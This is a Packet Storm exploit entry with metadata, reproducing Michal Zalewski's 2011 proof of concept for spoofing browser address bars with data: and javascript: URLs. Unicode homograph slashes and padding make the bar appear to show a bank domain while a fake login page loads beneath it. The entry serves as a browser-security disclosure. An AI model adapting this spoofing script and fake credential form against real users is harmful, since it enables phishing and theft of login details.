ID PACKETSTORM:107710 Type packetstorm Reporter Michal Zalewski Modified 2011-12-09T00:00:00
Description
`/*
From: Michal Zalewski <lcamtuf@coredump.cx>
Date: Fri, 9 Dec 2011 11:04:22 -0800
Subject: the week of silly PoCs continues: data://www.mybank.com/
Just another short note... this is a somewhat compelling and entirely
unnecessary phishing opportunity - and a tiny symptom of the mess with
URL handling.
Firefox and Opera allow you to omit MIME type in data: URLs, possibly
put random garbage into that section, and still get a valid HTML
document. This is a natural extension of how the Content-Type header
is handled in HTTP, but probably makes little or no sense here.
With the use of Unicode homographs, you can create fairly believable
URLs especially in Firefox:
http://lcamtuf.coredump.cx/switch/index2.html
The appearance may vary depending on your font selection; see
http://lcamtuf.coredump.cx/switch/reference.jpg for a sample capture.
If you know the special role of "data:", this won't fool you. But most
browser users don't, even if they grasp the basics of URL syntax to
begin with (of course, that part itself is not true in all too many
cases).
PS. It is probably better known that a less convincing variant of this
can be achieved with javascript: URLs in MSIE and some other browsers.
/mz
*/
Exploit:
<script>
var spaces = '\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003\u2003';
var bank_html =
'<html><title>Beaver Peak Banking and BBQ</title>' +
'<link rel="shortcut icon" href="http://lcamtuf.coredump.cx/ffabout/lock.ico">' +
'<img src="http://banking.beaver-peak.us/banking_interface/beaver-peak.jpg" style="float: left; margin-right: 10px">' +
'<font size=+3 color=steelblue><b>Beaver Peak Banking and BBQ</b></font><br>' +
'<i>"Best steaks in town!"</i> -- Creek and Brook Daily<br clear="all"><p> ' +
'<p><b>Please login to our secure banking system:</b><p><table><tr><td>Login:</td><td><input type=text></td></tr><tr>' +
'<td>Password:</td><td><input type=password></td></tr></table><p><input type=submit value="Log in!">' +
'<p><div style="border-width: 1px 0 0 0;border-color:steelblue; border-style:solid">' +
'<font color=gray size=-1>Member FDIC. FDA certified. Truck parking available.</font></div>';
var w;
function dostuff() {
if (navigator.userAgent.indexOf('Safari/') != -1)
alert('Sorry, no worky in this browser.');
if (navigator.userAgent.indexOf('; MSIE') != -1) {
w = window.open('javascript://www.wellsfargo.com/' + spaces + '%0a"<title>Beaver Peak Banking and BBQ</title>"', 'target');
setTimeout('w.document.body.innerHTML = bank_html', 100);
} else if(navigator.userAgent.indexOf('Opera/') != -1) {
w = window.open('data:,//www.wellsfargo.com/', 'target');
setTimeout('w.document.body.innerHTML = bank_html', 100);
} else {
w = window.open('data:\u2044\u2044www.wellsfargo.com\u2044' + spaces +',' + escape(bank_html), 'target');
}
}
</script>
<h3>You sniff MIME / assume HTML on <i>what</i>?</h3>
Just a delicious and completely unnecessary vector for phishing. The most convincing version of this is for Firefox,
thanks to Unicode homographs (YMMV, but here's a
<a href="reference.jpg">reference rendering</a>);
Opera comes second, and the MSIE variant (using a different approach) is barely of
any interest.
<p>
Safari and Chrome avoid the problem by not doing MIME sniffing or
presuming HTML on <code>data:</code> URLs (and by subsequently giving them a unique origin). The MSIE variant is
prevented in said browsers by not showing <code>javascript:"..."</code> URLs in the address bar.
<p>
<input type=submit onclick="dostuff()" value="Show me the thing"><p>
<p>
PS. If you combine this with my <a href="http://lcamtuf.coredump.cx/switch/">earlier PoC</a> to seamlessly replace http://www.trustedsite.com with
data://www.trustedsite.com, things get slightly more interesting.
`
{"id": "PACKETSTORM:107710", "type": "packetstorm", "bulletinFamily": "exploit", "title": "JavaScript Switcharoo Proof Of Concept 2", "description": "", "published": "2011-12-09T00:00:00", "modified": "2011-12-09T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/107710/JavaScript-Switcharoo-Proof-Of-Concept-2.html", "reporter": "Michal Zalewski", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:21:53", "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:21:53", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:21:53", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/107710/whimsical-switch2.txt", "sourceData": "`/* \n \nFrom: Michal Zalewski <lcamtuf@coredump.cx> \nDate: Fri, 9 Dec 2011 11:04:22 -0800 \nSubject: the week of silly PoCs continues: data://www.mybank.com/ \n \nJust another short note... this is a somewhat compelling and entirely \nunnecessary phishing opportunity - and a tiny symptom of the mess with \nURL handling. \n \nFirefox and Opera allow you to omit MIME type in data: URLs, possibly \nput random garbage into that section, and still get a valid HTML \ndocument. This is a natural extension of how the Content-Type header \nis handled in HTTP, but probably makes little or no sense here. \n \nWith the use of Unicode homographs, you can create fairly believable \nURLs especially in Firefox: \n \nhttp://lcamtuf.coredump.cx/switch/index2.html \n \nThe appearance may vary depending on your font selection; see \nhttp://lcamtuf.coredump.cx/switch/reference.jpg for a sample capture. \n \nIf you know the special role of \"data:\", this won't fool you. But most \nbrowser users don't, even if they grasp the basics of URL syntax to \nbegin with (of course, that part itself is not true in all too many \ncases). \n \nPS. It is probably better known that a less convincing variant of this \ncan be achieved with javascript: URLs in MSIE and some other browsers. \n \n/mz \n \n*/ \n \nExploit: \n \n<script> \n \nvar spaces = '\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003'; \n \nvar bank_html = \n'<html><title>Beaver Peak Banking and BBQ</title>' + \n'<link rel=\"shortcut icon\" href=\"http://lcamtuf.coredump.cx/ffabout/lock.ico\">' + \n'<img src=\"http://banking.beaver-peak.us/banking_interface/beaver-peak.jpg\" style=\"float: left; margin-right: 10px\">' + \n'<font size=+3 color=steelblue><b>Beaver Peak Banking and BBQ</b></font><br>' + \n'<i>\"Best steaks in town!\"</i> -- Creek and Brook Daily<br clear=\"all\"><p> ' + \n'<p><b>Please login to our secure banking system:</b><p><table><tr><td>Login:</td><td><input type=text></td></tr><tr>' + \n'<td>Password:</td><td><input type=password></td></tr></table><p><input type=submit value=\"Log in!\">' + \n'<p><div style=\"border-width: 1px 0 0 0;border-color:steelblue; border-style:solid\">' + \n'<font color=gray size=-1>Member FDIC. FDA certified. Truck parking available.</font></div>'; \n \nvar w; \n \nfunction dostuff() { \n \nif (navigator.userAgent.indexOf('Safari/') != -1) \nalert('Sorry, no worky in this browser.'); \n \nif (navigator.userAgent.indexOf('; MSIE') != -1) { \nw = window.open('javascript://www.wellsfargo.com/' + spaces + '%0a\"<title>Beaver Peak Banking and BBQ</title>\"', 'target'); \nsetTimeout('w.document.body.innerHTML = bank_html', 100); \n} else if(navigator.userAgent.indexOf('Opera/') != -1) { \nw = window.open('data:,//www.wellsfargo.com/', 'target'); \nsetTimeout('w.document.body.innerHTML = bank_html', 100); \n} else { \nw = window.open('data:\\u2044\\u2044www.wellsfargo.com\\u2044' + spaces +',' + escape(bank_html), 'target'); \n} \n \n} \n \n</script> \n \n<h3>You sniff MIME / assume HTML on <i>what</i>?</h3> \n \nJust a delicious and completely unnecessary vector for phishing. The most convincing version of this is for Firefox, \nthanks to Unicode homographs (YMMV, but here's a \n<a href=\"reference.jpg\">reference rendering</a>); \nOpera comes second, and the MSIE variant (using a different approach) is barely of \nany interest. \n<p> \nSafari and Chrome avoid the problem by not doing MIME sniffing or \npresuming HTML on <code>data:</code> URLs (and by subsequently giving them a unique origin). The MSIE variant is \nprevented in said browsers by not showing <code>javascript:\"...\"</code> URLs in the address bar. \n \n<p> \n \n<input type=submit onclick=\"dostuff()\" value=\"Show me the thing\"><p> \n \n<p> \nPS. If you combine this with my <a href=\"http://lcamtuf.coredump.cx/switch/\">earlier PoC</a> to seamlessly replace http://www.trustedsite.com with \ndata://www.trustedsite.com, things get slightly more interesting. \n \n \n`\n", "immutableFields": []}